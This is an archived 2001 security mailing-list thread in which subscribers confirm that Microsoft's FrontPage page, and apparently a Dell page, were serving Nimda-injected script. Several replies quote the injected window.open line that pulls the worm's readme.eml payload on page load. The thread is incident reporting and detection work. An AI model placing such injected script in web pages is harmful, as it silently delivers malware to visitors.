From incidents-return-1582-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:03 2001 Mailing-List: contact incidents-help@securityfocus.com; run by ezmlm From: "Steve Cody" To: Subject: Please tell me I'm wrong: microsoft.com infected Date: Wed, 19 Sep 2001 15:37:39 -0400 X-Mailer: Microsoft Outlook, Build 10.0.2627 Mime-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=iso-8859-1 Status: RO Content-Length: 507 Lines: 15 I just went to http://www.microsoft.com/frontpage, and my Symantec Norton Antivirus popped up and denied access to readme.eml. I could not view the source of the loaded page, so I can't verify that it is definitely infected. Steve ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com From incidents-return-1588-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:19 2001 Mailing-List: contact incidents-help@securityfocus.com; run by ezmlm Date: Wed, 19 Sep 2001 15:59:25 -0500 From: Rodrigo Goya To: Steve Cody Cc: incidents@securityfocus.com Subject: Re: Please tell me I'm wrong: microsoft.com infected Mail-Followup-To: Steve Cody , incidents@securityfocus.com User-Agent: Mutt/1.2.5i Mime-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=iso-8859-1 Status: RO Content-Length: 1008 Lines: 33 Confirmed I see it: window.open("readme.eml", null, "resizable=no,top=6000,left=6000") Though it says "page not found". Cheers, Rodrigo On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote: > I just went to http://www.microsoft.com/frontpage, and my Symantec > Norton Antivirus popped up and denied access to readme.eml. > > I could not view the source of the loaded page, so I can't verify that > it is definitely infected. > > Steve > > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com From incidents-return-1587-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:23 2001 Mailing-List: contact incidents-help@securityfocus.com; run by ezmlm Date: Wed, 19 Sep 2001 17:54:03 -0400 From: "Michael H. Warfield" To: Steve Cody Cc: incidents@securityfocus.com Subject: Re: Please tell me I'm wrong: microsoft.com infected Mail-Followup-To: Steve Cody , incidents@securityfocus.com User-Agent: Mutt/1.3.20i Mime-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=iso-8859-1 Status: RO Content-Length: 1485 Lines: 36 On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote: > I just went to http://www.microsoft.com/frontpage, and my Symantec > Norton Antivirus popped up and denied access to readme.eml. > I could not view the source of the loaded page, so I can't verify that > it is definitely infected. Yes, indeedie do. Just did a wget http://www.microsoft.com/frontpage and here is what's on da bottom: [html][script language="JavaScript"]window.open("readme.eml", null, "resizable=no,top=6000,left=6000")[/script][/html] Defanged by turning angle brackets into square brackets even though it's not in an html attachment. ;-) > Steve > > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (678) 463-0932 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com From incidents-return-1590-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:20 2001 Mailing-List: contact incidents-help@securityfocus.com; run by ezmlm Reply-To: From: "Brian Morin" To: "'Steve Cody'" , Subject: RE: Please tell me I'm wrong: microsoft.com infected Date: Wed, 19 Sep 2001 16:55:20 -0500 Organization: Brightblade X-Mailer: Microsoft Outlook, Build 10.0.2627 Mime-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=iso-8859-1 Status: RO Content-Length: 1229 Lines: 39 OmG.. You are correct, check out the source... -- Brian Morin : -----Original Message----- : From: Steve Cody [mailto:security@gulbrandsen.com] : Sent: Wednesday, September 19, 2001 14:38 : To: incidents@securityfocus.com : Subject: Please tell me I'm wrong: microsoft.com infected : : : I just went to http://www.microsoft.com/frontpage, and my : Symantec Norton Antivirus popped up and denied access to readme.eml. : : I could not view the source of the loaded page, so I can't : verify that it is definitely infected. : : Steve : : : -------------------------------------------------------------- : -------------- : This list is provided by the SecurityFocus ARIS analyzer : service. For more information on this free incident handling, : management : and tracking system please see: http://aris.securityfocus.com : ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com From incidents-return-1589-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:18 2001 Mailing-List: contact incidents-help@securityfocus.com; run by ezmlm Date: Wed, 19 Sep 2001 15:01:32 -0700 (PDT) From: Benjamin Franz To: Subject: Re: Please tell me I'm wrong: microsoft.com infected Mime-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=iso-8859-1 Status: RO Content-Length: 876 Lines: 29 On Wed, 19 Sep 2001, Steve Cody wrote: > I just went to http://www.microsoft.com/frontpage, and my Symantec > Norton Antivirus popped up and denied access to readme.eml. > > I could not view the source of the loaded page, so I can't verify that > it is definitely infected. >From the bottom of the page served from that URL: window.open("readme.eml", null, "resizable=no,top=6000,left=6000") I would call that a definite "Yes". -- Benjamin Franz Programs must be written for people to read, and only incidentally for machines to execute. ---Abelson and Sussman ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com From incidents-return-1591-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:24 2001 Mailing-List: contact incidents-help@securityfocus.com; run by ezmlm Date: Wed, 19 Sep 2001 15:02:43 -0700 (PDT) From: "Jay D. Dyson" Reply-To: "Jay D. Dyson" To: Incidents List , Bugtraq Cc: Steve Cody Subject: Re: Please tell me I'm wrong: microsoft.com infected Organization: Treachery Unlimited - http://www.treachery.net/ Restrict: no-external-archive Mime-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=iso-8859-1 Status: RO Content-Length: 1662 Lines: 51 -----BEGIN PGP SIGNED MESSAGE----- On Wed, 19 Sep 2001, Steve Cody wrote: > I just went to http://www.microsoft.com/frontpage, and my Symantec > Norton Antivirus popped up and denied access to readme.eml. > > I could not view the source of the loaded page, so I can't verify that > it is definitely infected. Your worst fears have now been confirmed. sasumata$ telnet www.microsoft.com 80 Trying 207.46.197.100... Connected to www.microsoft.akadns.net. Escape character is '^]'. GET /frontpage/ HTTP/1.0 Microsoft's site has been compromised by Nimda. There is no disputing it now. - -Jay ( ( _______ )) )) .--"There's always time for a good cup of coffee"--. >====<--. C|~~|C|~~| (>------ Jay D. Dyson -- jdyson@treachery.net ------<) | = |-' `--' `--' `-- What doesn't kill us only makes us stronger. --' `------' -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: See http://www.treachery.net/~jdyson/ for current keys. iQCVAwUBO6kH9rlDRyqRQ2a9AQESugP8C6RIIUmkcV/e6ifRNqz067ER5PSizDDA APzdpR1DO1Q9N5lMEtUagEshgDSYiGKUBU+5vesKZ7TWCjad4iuY8ME0oe4yZxjv acSX3Tqo0b+sQtJ5VF1IYSljqSbZ+EvYYDUUF8PEmQdkyCp2u/J8HX+duykaisvc 5CjLcnLK5U8= =DIF4 -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com From incidents-return-1592-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:29 2001 Mailing-List: contact incidents-help@securityfocus.com; run by ezmlm From: jmiller@rhythms.net To: incidents@securityfocus.com Subject: RE: Please tell me I'm wrong: microsoft.com infected Date: Wed, 19 Sep 2001 16:13:39 -0600 X-Mailer: Internet Mail Service (5.5.2653.19) Mime-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=iso-8859-1 Status: RO Content-Length: 1104 Lines: 33 Microsoft is not the only one, Dell is infected as well. http://docs.us.dell.com/docs/systems/pcpxhj/ Jeremy -----Original Message----- From: Steve Cody [mailto:security@gulbrandsen.com] Sent: Wednesday, September 19, 2001 1:38 PM To: incidents@securityfocus.com Subject: Please tell me I'm wrong: microsoft.com infected I just went to http://www.microsoft.com/frontpage, and my Symantec Norton Antivirus popped up and denied access to readme.eml. I could not view the source of the loaded page, so I can't verify that it is definitely infected. Steve ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com